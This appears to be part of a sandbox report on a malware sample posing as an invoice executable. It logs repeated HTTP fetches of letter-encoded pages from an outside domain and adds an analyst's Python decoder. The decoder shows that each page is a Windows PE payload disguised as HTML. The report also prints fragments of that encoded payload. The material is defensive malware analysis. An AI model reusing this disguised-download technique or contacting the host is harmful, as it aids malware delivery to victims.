                                                                                                                                                                Data Ascii: 6b8d<p>GGhMFhutthFhLhFhFhFhthFhFhFhKTThKTThFhFhuRthFhFhFhFhFhFhFhjthFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhuKRhFhFhFhuthLuhuRjhuthFhuRFhMhKFThLLhuRthuhGjhKFThLLhRthuFthuFThuuThLKhuuKhuuthuuuhuFLhuuthMGhuFMhLKhMMhMGhuuFhuuFhuuuhuujhLKhMRhuFuhLKhuuthuuGhuuFhLKhuFThuuFhLKhjRhGMhRLhLKhuFMhuuuhuFFhuFuhtjhuLhuLhuFhLjhFhFhFhFhFhFhFhRFhjMhFhFhGjhuhLhFhGjhutKhtuhuRFhFhFhFhFhFhFhFhFhKKthFhLthFhuuhuhRFhFhFhuFFhuFhFhFhjhFhFhFhFhFhFhuMFhuLuhuFhFhFhLKhFhFhFhujFhuFhFhFhFhFhuKRhFhLKhFhFhFhKhFhFhthFhFhFhFhFhFhFhthFhFhF
Feb 22, 2021 07:45:15.134008884 CET | 2436 | OUT | GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:45:15.218117952 CET | 2437 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:45:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d575ae11389c434ba4dbd06ab19825ade1613976315; expires=Wed, 24-Mar-21 06:45:15 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:37 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a153d2400001e9555bf4000000001
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YUV5g258BDxBOAOf%2BF40BPshO9A0IR0MWLFg4XTlCVj4i0p065a6f0KQSGkFOeDfF0VPKTo%2FDj4JV8Pu4ldrPe0od7faOm1CfDXquPT3fPnaCSpS"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 6256be41def41e95-AMS
                                                                                                                                                                Data Raw: 39 31 30 0d 0a 3c 70 3e 54 74 68 75 6a 75 68 4d 47 68 75 54 46 68 47 6a 68 75 47 4b 68 75 6a 74 68 75 75 75 68 75 6a 4c 68 75 47 47 68 4d 46 68 75 47 75 68 4b 4c 4d 68 75 4b 74 68 4d 6a 68 4b 74 74 68 4b 74 75 68 47 4c 68 75 4c 74 68 54 4b 68 75 4d 46 68 4b 4c 4c 68 4b 4b 74 68 6a 75 68 4d 47 68 75 4b 52 68 75 6a 4c 68 52 4d 68 4d 75 68 4b 4b 52 68 6a 75 68 47 46 68 6a 54 68 4b 46 4b 68 74 6a 68 6a 4c 68 75 4b 6a 68 75 52 4b 68 4d 54 68 4c 68 75 75 4d 68 75 52 52 68 4b 74 68 4b 4b 46 68 4b 4b 54 68 74 74 68 54 47 68 4b 75 54 68 47 75 68 75 4b 46 68 75 46 4d 68 75 74 75 68 4c 54 68 54 6a 68 6a 54 68 4b 46 6a 68 4d 4b 68 4b 4c 4b 68 75 4d 4c 68 54 74 68 54 52 68 75 4c 68 4c 47 68 6a 6a 68 4b 4c 75 68 4b 4c 74 68 75 74 54 68 4b 75 74 68 4b 46 4d 68 75 75 46 68 4b 4c 74 68 75 4c 47 68 6a 52 68 75 74 52 68 4b 4c 54 68 75 4d 74 68 4b 4b 46 68 4d 75 68 75 52 75 68 75 74 4d 68 4b 4b 4d 68 4b 74 4d 68 75 75 74 68 75 47 68 47 54 68 54 52 68 6a 47 68 75 4d 75 68 4c 4d 68 75 75 4d 68 4c 4b 68 75 52 4c 68 4d 6a 68 75 4c 4b 68 74 4b 68 75 6a 46 68 4b 47 68 75 75 74 68 75 4b 46 68 75 6a 52 68 75 4d 4c 68 47 54 68 4b 75 54 68 75 6a 75 68 4b 75 4c 68 75 47 54 68 75 47 46 68 75 47 4c 68 47 52 68 47 4c 68 75 52 75 68 75 54 74 68 4c 54 68 4d 46 68 4b 46 52 68 4b 46 68 4b 4d 68 47 4c 68 75 52 4d 68 4d 68 75 52 54 68 75 4c 68 6a 47 68 75 47 47 68 75 74 74 68 75 75 54 68 75 47 75 68 4c 47 68 75 47 54 68 75 4b 47 68 4b 75 52 68 4b 54 74 68 75 4c 4d 68 47 68 4b 4c 68 4b 46 74 68 4b 75 6a 68 54 46 68 52 4c 68 75 74 46 68 75 54 4c 68 47 4d 68 4b 4b 68 4b 4b 54 68 75 6a 4b 68 75 47 6a 68 54 75 68 75 6a 52 68 75 4d 47 68 75 4d
                                                                                                                                                                Data Ascii: 910<p>TthujuhMGhuTFhGjhuGKhujthuuuhujLhuGGhMFhuGuhKLMhuKthMjhKtthKtuhGLhuLthTKhuMFhKLLhKKthjuhMGhuKRhujLhRMhMuhKKRhjuhGFhjThKFKhtjhjLhuKjhuRKhMThLhuuMhuRRhKthKKFhKKThtthTGhKuThGuhuKFhuFMhutuhLThTjhjThKFjhMKhKLKhuMLhTthTRhuLhLGhjjhKLuhKLthutThKuthKFMhuuFhKLthuLGhjRhutRhKLThuMthKKFhMuhuRuhutMhKKMhKtMhuuthuGhGThTRhjGhuMuhLMhuuMhLKhuRLhMjhuLKhtKhujFhKGhuuthuKFhujRhuMLhGThKuThujuhKuLhuGThuGFhuGLhGRhGLhuRuhuTthLThMFhKFRhKFhKMhGLhuRMhMhuRThuLhjGhuGGhutthuuThuGuhLGhuGThuKGhKuRhKTthuLMhGhKLhKFthKujhTFhRLhutFhuTLhGMhKKhKKThujKhuGjhTuhujRhuMGhuM
Feb 22, 2021 07:45:20.620404959 CET | 3500 | OUT | GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:45:20.684407949 CET | 3501 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:45:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d88ce87054a667665c0e7c7d191f4cde91613976320; expires=Wed, 24-Mar-21 06:45:20 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:39 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a15529200001e95118be000000001
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5rEgDYmm6OZ6%2Fju6Po0C2wOB1D4yc8eZi1bLek2X2%2FWqfAXRRUKWr8zCkg9bMJGGGyaVVijB07%2B5PPYtwdussr1BQY0Fbp4ZPkO14dXoFMqouBrY"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 6256be6418da1e95-AMS
                                                                                                                                                                Data Raw: 61 36 38 0d 0a 3c 70 3e 68 75 46 52 68 46 68 75 46 75 68 46 68 6a 52 68 46 68 75 46 75 68 46 68 75 75 54 68 46 68 4d 4d 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 75 4b 68 46 68 75 75 6a 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 46 68 46 68 46 68 46 68 74 52 68 46 68 52 68 46 68 75 68 46 68 47 46 68 46 68 75 46 54 68 46 68 75 46 52 68 46 68 75 46 75 68 46 68 52 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 54 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 74 4d 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 46 68 46 68 6a 4b 68 46 68 75 54 68 46 68 75 68 46 68 47 4c 68 46 68 75 75 46 68 46 68 75 75 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 46 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 47 52 68 46 68 4d 47 68 46 68 75 46 4d 68 46 68 75 46 75 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 74 6a 68 46 68 75 46 46 68 46 68 75 46 52 68 46 68 75 46 52 68 46 68 46 68 46 68 46 68 46 68 47 4b 68 46 68 75 52 68 46 68 75 68 46 68 47 6a 68 46 68 75 46 75 68 46 68 75 46 4c 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 6a 47 68 46 68 75 75 75 68 46 68 75 75 4b 68 46 68 75 4b 75 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 46 4c 68 46 68 75 46 74 68 46 68 75
                                                                                                                                                                Data Ascii: a68<p>huFRhFhuFuhFhjRhFhuFuhFhuuThFhMMhFhuuthFhuFThFhuuKhFhuujhFhuFThFhuuuhFhuuFhFhFhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhFhFhFhFhtRhFhRhFhuhFhGFhFhuFThFhuFRhFhuFuhFhRjhFhuFuhFhuuthFhuuThFhuFThFhuuuhFhuuFhFhFhFhFhFhtMhFhtjhFhtRhFhtjhFhtRhFhtjhFhtRhFhFhFhjKhFhuThFhuhFhGLhFhuuFhFhuujhFhuFuhFhuuthFhuuFhFhMGhFhuFRhFhGRhFhMGhFhuFMhFhuFuhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhtjhFhuFFhFhuFRhFhuFRhFhFhFhFhFhGKhFhuRhFhuhFhGjhFhuFuhFhuFLhFhMGhFhuFRhFhjGhFhuuuhFhuuKhFhuKuhFhuuthFhuFThFhuFLhFhuFthFhu
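
The three responses in session 0 are chunked HTML whose only content is a single <p> element filled with runs of the letters F, G, j, K, L, M, R, t, T and u, each run separated by the letter h. Reading every h-delimited run as a decimal byte value, with those ten letters standing in for the digits 0 to 9 (F=0, u=1, K=2, L=3, t=4, T=5, j=6, G=7, R=8, M=9), turns the first runs of the 751448401274A413C5FF91CCBC4EFF60.html body (GG, MF, utt, F, L) into 77, 90, 144, 0, 3: the start of an MZ header. The same table then yields the DOS stub text "This program cannot be run in DOS mode." and a PE\0\0 signature at exactly the offset the header's e_lfanew field points to, so the "web page" is a PE image written out with a substituted digit alphabet. The decoder below is an added example written for this report, not code from the sample, the sandbox or the operator; the letter-to-digit table is inferred from the captured body rather than documented anywhere on the page, and the sample input is the session 0 Data Ascii text transcribed from above (the capture is truncated there, and the 35 zero bytes of the reserved DOS-header fields are written as "Fh" * 35 for brevity).

```python
import re

# Digit alphabet inferred from the captured body: the first h-separated runs
# "GG", "MF", "utt", "F", "L" decode to 77, 90, 144, 0, 3 (an MZ header), and
# later runs spell "This program cannot be run in DOS mode."
DIGITS = {"F": 0, "u": 1, "K": 2, "L": 3, "t": 4, "T": 5, "j": 6, "G": 7, "R": 8, "M": 9}
SEPARATOR = "h"

# Start of the body served for /base/751448401274A413C5FF91CCBC4EFF60.html, transcribed
# from the session 0 "Data Ascii" line of this report (the capture is truncated there).
# The run of 35 zero bytes in the reserved DOS-header fields is written as "Fh" * 35.
SAMPLE_BODY = (
    "6b8d"  # chunk-size line of the chunked response; its CRLF is lost in the ASCII view
    "<p>"
    "GGhMFhutthFhLhFhFhFhthFhFhFhKTThKTThFhFhuRthFhFhFhFhFhFhFhjth"
    + "Fh" * 35
    + "uKRhFhFhFhuthLuhuRjhuthFhuRFhMhKFThLLhuRthuhGjhKFThLLh"
    "RthuFthuFThuuThLKhuuKhuuthuuuhuFLhuuthMGhuFMhLKhMMhMGhuuFhuuFhuuuhuujhLKhMRhuFuhLKh"
    "uuthuuGhuuFhLKhuFThuuFhLKhjRhGMhRLhLKhuFMhuuuhuFFhuFuhtjhuLhuLhuFhLjh"
    "FhFhFhFhFhFhFhRFhjMhFhFhGjhuhLhFhGjhutKhtuhuRFhFhFhFhFhFhFhFhFhKKthFhLthFhuuhuh"
)


def strip_transport(body: str) -> str:
    """Remove the HTTP chunk-size prefix and the <p>...</p> wrapper around the encoded data."""
    text = body.strip()
    # A chunk-size line is hex digits plus CRLF; in the report's ASCII rendering the CRLF
    # is gone, so also accept a size that runs straight into the <p> tag.
    text = re.sub(r"^[0-9a-fA-F]+(?:\r?\n|(?=<p>))", "", text)
    text = re.sub(r"^<p>", "", text)
    text = re.sub(r"</p>.*$", "", text, flags=re.S)
    return text.strip()


def alphabet(text: str) -> list:
    """Distinct symbols used by the encoding, excluding the separator (ten, one per digit)."""
    return sorted(set(text) - {SEPARATOR})


def decode(body: str) -> bytes:
    """Turn h-separated digit runs into bytes; reject anything outside the alphabet."""
    out = bytearray()
    for token in strip_transport(body).split(SEPARATOR):
        if not token:  # trailing separator or truncated capture
            continue
        value = 0
        for ch in token:
            if ch not in DIGITS:
                raise ValueError(f"unexpected symbol {ch!r} in token {token!r}")
            value = value * 10 + DIGITS[ch]
        if value > 0xFF:
            raise ValueError(f"token {token!r} exceeds a byte")
        out.append(value)
    return bytes(out)


def pe_summary(data: bytes) -> dict:
    """Sanity-check the decoded bytes as the beginning of a PE image."""
    e_lfanew = int.from_bytes(data[60:64], "little") if len(data) >= 64 else None
    return {
        "mz": data[:2] == b"MZ",
        "e_lfanew": e_lfanew,
        "pe_signature": e_lfanew is not None and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00",
        "dos_stub": b"This program cannot be run in DOS mode." in data,
        "decoded_bytes": len(data),
    }


if __name__ == "__main__":
    payload = decode(SAMPLE_BODY)
    print("alphabet:", "".join(alphabet(strip_transport(SAMPLE_BODY))))
    print(pe_summary(payload))
```

Session 1 below requests the same two paths again and receives the same body, so the fetched stage is static rather than generated per request; the decoder applies unchanged to those bodies and to the other two /base/ paths, which use the same ten-letter alphabet.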


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49723 | 104.21.71.230 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 07:45:50.086365938 CET | 3536 | OUT | GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 22, 2021 07:45:50.237845898 CET | 3537 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:45:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da9da49a1ad446d250b6a7f28669a096b1613976350; expires=Wed, 24-Mar-21 06:45:50 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:34 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a15c5ab00000b2fed27e000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NAj%2F9ytraq%2BgV4WGqx4B%2B6UQF45h7Qr9fFFU3uiU%2FoO6cGVJ66YSH%2FdMtkWXfPh6h2apldooO94cK6pJ8roUP0tLY9vY4J1hYYbPn6FGnZMvTrWq"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6256bf1c4f7f0b2f-AMS
                                                                                                                                                                Data Raw: 63 63 64 0d 0a 3c 70 3e 47 47 68 4d 46 68 75 74 74 68 46 68 4c 68 46 68 46 68 46 68 74 68 46 68 46 68 46 68 4b 54 54 68 4b 54 54 68 46 68 46 68 75 52 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 6a 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 46 68 46 68 75 74 68 4c 75 68 75 52 6a 68 75 74 68 46 68 75 52 46 68 4d 68 4b 46 54 68 4c 4c 68 75 52 74 68 75 68 47 6a 68 4b 46 54 68 4c 4c 68 52 74 68 75 46 74 68 75 46 54 68 75 75 54 68 4c 4b 68 75 75 4b 68 75 75 74 68 75 75 75 68 75 46 4c 68 75 75 74 68 4d 47 68 75 46 4d 68 4c 4b 68 4d 4d 68 4d 47 68 75 75 46 68 75 75 46 68 75 75 75 68 75 75 6a 68 4c 4b 68 4d 52 68 75 46 75 68 4c 4b 68 75 75 74 68 75 75 47 68 75 75 46 68 4c 4b 68 75 46 54 68 75 75 46 68 4c 4b 68 6a 52 68 47 4d 68 52 4c 68 4c 4b 68 75 46 4d 68 75 75 75 68 75 46 46 68 75 46 75 68 74 6a 68 75 4c 68 75 4c 68 75 46 68 4c 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 52 46 68 6a 4d 68 46 68 46 68 47 6a 68 75 68 4c 68 46 68 47 6a 68 75 74 4b 68 74 75 68 75 52 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 4b 4b 74 68 46 68 4c 74 68 46 68 75 75 68 75 68 52 46 68 46 68 46 68 75 46 46 68 75 46 68 46 68 46 68 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4d 46 68 75 4c 75 68 75 46 68 46 68 46 68 4c 4b 68 46 68 46 68 46 68 75 6a 46 68 75 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 4c 4b 68 46 68 46 68 46 68 4b 68 46 68 46 68 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 74 68 46 68
                                                                                                                                                                Data Ascii: ccd<p>GGhMFhutthFhLhFhFhFhthFhFhFhKTThKTThFhFhuRthFhFhFhFhFhFhFhjthFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhuKRhFhFhFhuthLuhuRjhuthFhuRFhMhKFThLLhuRthuhGjhKFThLLhRthuFthuFThuuThLKhuuKhuuthuuuhuFLhuuthMGhuFMhLKhMMhMGhuuFhuuFhuuuhuujhLKhMRhuFuhLKhuuthuuGhuuFhLKhuFThuuFhLKhjRhGMhRLhLKhuFMhuuuhuFFhuFuhtjhuLhuLhuFhLjhFhFhFhFhFhFhFhRFhjMhFhFhGjhuhLhFhGjhutKhtuhuRFhFhFhFhFhFhFhFhFhKKthFhLthFhuuhuhRFhFhFhuFFhuFhFhFhjhFhFhFhFhFhFhuMFhuLuhuFhFhFhLKhFhFhFhujFhuFhFhFhFhFhuKRhFhLKhFhFhFhKhFhFhthFhFhFhFhFhFhFhthFh
Feb 22, 2021 07:45:59.721924067 CET | 4812 | OUT | GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:45:59.802328110 CET | 5055 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:45:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dd192f16d50cf2cdcff1b72c1147de5be1613976359; expires=Wed, 24-Mar-21 06:45:59 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:37 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a15eb4f00000b2fe406b000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=htr9GvRNX%2BhfzBrSEHms38k5UQF1OEXK56wlVDWpPoMibQ22kO7NR4xY%2BJIO0%2Bg44Sv3%2BVADdJsjO9STkn3ooO9oOdmsQ6GBG0VuPSdq1aufJ1lv"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6256bf58798f0b2f-AMS
                                                                                                                                                                Data Raw: 33 32 35 32 0d 0a 3c 70 3e 54 74 68 75 6a 75 68 4d 47 68 75 54 46 68 47 6a 68 75 47 4b 68 75 6a 74 68 75 75 75 68 75 6a 4c 68 75 47 47 68 4d 46 68 75 47 75 68 4b 4c 4d 68 75 4b 74 68 4d 6a 68 4b 74 74 68 4b 74 75 68 47 4c 68 75 4c 74 68 54 4b 68 75 4d 46 68 4b 4c 4c 68 4b 4b 74 68 6a 75 68 4d 47 68 75 4b 52 68 75 6a 4c 68 52 4d 68 4d 75 68 4b 4b 52 68 6a 75 68 47 46 68 6a 54 68 4b 46 4b 68 74 6a 68 6a 4c 68 75 4b 6a 68 75 52 4b 68 4d 54 68 4c 68 75 75 4d 68 75 52 52 68 4b 74 68 4b 4b 46 68 4b 4b 54 68 74 74 68 54 47 68 4b 75 54 68 47 75 68 75 4b 46 68 75 46 4d 68 75 74 75 68 4c 54 68 54 6a 68 6a 54 68 4b 46 6a 68 4d 4b 68 4b 4c 4b 68 75 4d 4c 68 54 74 68 54 52 68 75 4c 68 4c 47 68 6a 6a 68 4b 4c 75 68 4b 4c 74 68 75 74 54 68 4b 75 74 68 4b 46 4d 68 75 75 46 68 4b 4c 74 68 75 4c 47 68 6a 52 68 75 74 52 68 4b 4c 54 68 75 4d 74 68 4b 4b 46 68 4d 75 68 75 52 75 68 75 74 4d 68 4b 4b 4d 68 4b 74 4d 68 75 75 74 68 75 47 68 47 54 68 54 52 68 6a 47 68 75 4d 75 68 4c 4d 68 75 75 4d 68 4c 4b 68 75 52 4c 68 4d 6a 68 75 4c 4b 68 74 4b 68 75 6a 46 68 4b 47 68 75 75 74 68 75 4b 46 68 75 6a 52 68 75 4d 4c 68 47 54 68 4b 75 54 68 75 6a 75 68 4b 75 4c 68 75 47 54 68 75 47 46 68 75 47 4c 68 47 52 68 47 4c 68 75 52 75 68 75 54 74 68 4c 54 68 4d 46 68 4b 46 52 68 4b 46 68 4b 4d 68 47 4c 68 75 52 4d 68 4d 68 75 52 54 68 75 4c 68 6a 47 68 75 47 47 68 75 74 74 68 75 75 54 68 75 47 75 68 4c 47 68 75 47 54 68 75 4b 47 68 4b 75 52 68 4b 54 74 68 75 4c 4d 68 47 68 4b 4c 68 4b 46 74 68 4b 75 6a 68 54 46 68 52 4c 68 75 74 46 68 75 54 4c 68 47 4d 68 4b 4b 68 4b 4b 54 68 75 6a 4b 68 75 47 6a 68 54 75 68 75 6a 52 68 75
                                                                                                                                                                Data Ascii: 3252<p>TthujuhMGhuTFhGjhuGKhujthuuuhujLhuGGhMFhuGuhKLMhuKthMjhKtthKtuhGLhuLthTKhuMFhKLLhKKthjuhMGhuKRhujLhRMhMuhKKRhjuhGFhjThKFKhtjhjLhuKjhuRKhMThLhuuMhuRRhKthKKFhKKThtthTGhKuThGuhuKFhuFMhutuhLThTjhjThKFjhMKhKLKhuMLhTthTRhuLhLGhjjhKLuhKLthutThKuthKFMhuuFhKLthuLGhjRhutRhKLThuMthKKFhMuhuRuhutMhKKMhKtMhuuthuGhGThTRhjGhuMuhLMhuuMhLKhuRLhMjhuLKhtKhujFhKGhuuthuKFhujRhuMLhGThKuThujuhKuLhuGThuGFhuGLhGRhGLhuRuhuTthLThMFhKFRhKFhKMhGLhuRMhMhuRThuLhjGhuGGhutthuuThuGuhLGhuGThuKGhKuRhKTthuLMhGhKLhKFthKujhTFhRLhutFhuTLhGMhKKhKKThujKhuGjhTuhujRhu
Feb 22, 2021 07:46:02.884833097 CET | 6556 | OUT | GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:46:02.953874111 CET | 6558 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:46:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dea0900533435620ea8b6eeeb56d575811613976362; expires=Wed, 24-Mar-21 06:46:02 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:39 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a15f7ab00000b2fbd8c8000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cP%2BolFkClAC%2FvgHENRLWd2G%2Fc%2BHFVTECKw2LHMtXh6s0nuHHSmz6uaQuTfk%2FQ8Tpm9Y%2BEM%2FusdXGiJ5YDLExL2MV4RproUngVlkcx7RjXyzlQvcb"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6256bf6c4d410b2f-AMS
                                                                                                                                                                Data Raw: 61 36 38 0d 0a 3c 70 3e 68 75 46 52 68 46 68 75 46 75 68 46 68 6a 52 68 46 68 75 46 75 68 46 68 75 75 54 68 46 68 4d 4d 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 75 4b 68 46 68 75 75 6a 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 46 68 46 68 46 68 46 68 74 52 68 46 68 52 68 46 68 75 68 46 68 47 46 68 46 68 75 46 54 68 46 68 75 46 52 68 46 68 75 46 75 68 46 68 52 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 54 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 74 4d 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 46 68 46 68 6a 4b 68 46 68 75 54 68 46 68 75 68 46 68 47 4c 68 46 68 75 75 46 68 46 68 75 75 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 46 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 47 52 68 46 68 4d 47 68 46 68 75 46 4d 68 46 68 75 46 75 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 74 6a 68 46 68 75 46 46 68 46 68 75 46 52 68 46 68 75 46 52 68 46 68 46 68 46 68 46 68 46 68 47 4b 68 46 68 75 52 68 46 68 75 68 46 68 47 6a 68 46 68 75 46 75 68 46 68 75 46 4c 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 6a 47 68 46 68 75 75 75 68 46 68 75 75 4b 68 46 68 75 4b 75 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 46 4c 68 46
                                                                                                                                                                Data Ascii: a68<p>huFRhFhuFuhFhjRhFhuFuhFhuuThFhMMhFhuuthFhuFThFhuuKhFhuujhFhuFThFhuuuhFhuuFhFhFhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhFhFhFhFhtRhFhRhFhuhFhGFhFhuFThFhuFRhFhuFuhFhRjhFhuFuhFhuuthFhuuThFhuFThFhuuuhFhuuFhFhFhFhFhFhtMhFhtjhFhtRhFhtjhFhtRhFhtjhFhtRhFhFhFhjKhFhuThFhuhFhGLhFhuuFhFhuujhFhuFuhFhuuthFhuuFhFhMGhFhuFRhFhGRhFhMGhFhuFMhFhuFuhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhtjhFhuFFhFhuFRhFhuFRhFhFhFhFhFhGKhFhuRhFhuhFhGjhFhuFuhFhuFLhFhMGhFhuFRhFhjGhFhuuuhFhuuKhFhuKuhFhuuthFhuFThFhuFLhF


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49726 | 104.21.71.230 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 07:45:59.300759077 CET | 4602 | OUT | GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 22, 2021 07:45:59.399612904 CET | 4604 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:45:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d20f155f33323495e33d6ddb2b7b8e8001613976359; expires=Wed, 24-Mar-21 06:45:59 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:34 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a15e9aa00000b638f92d000000001
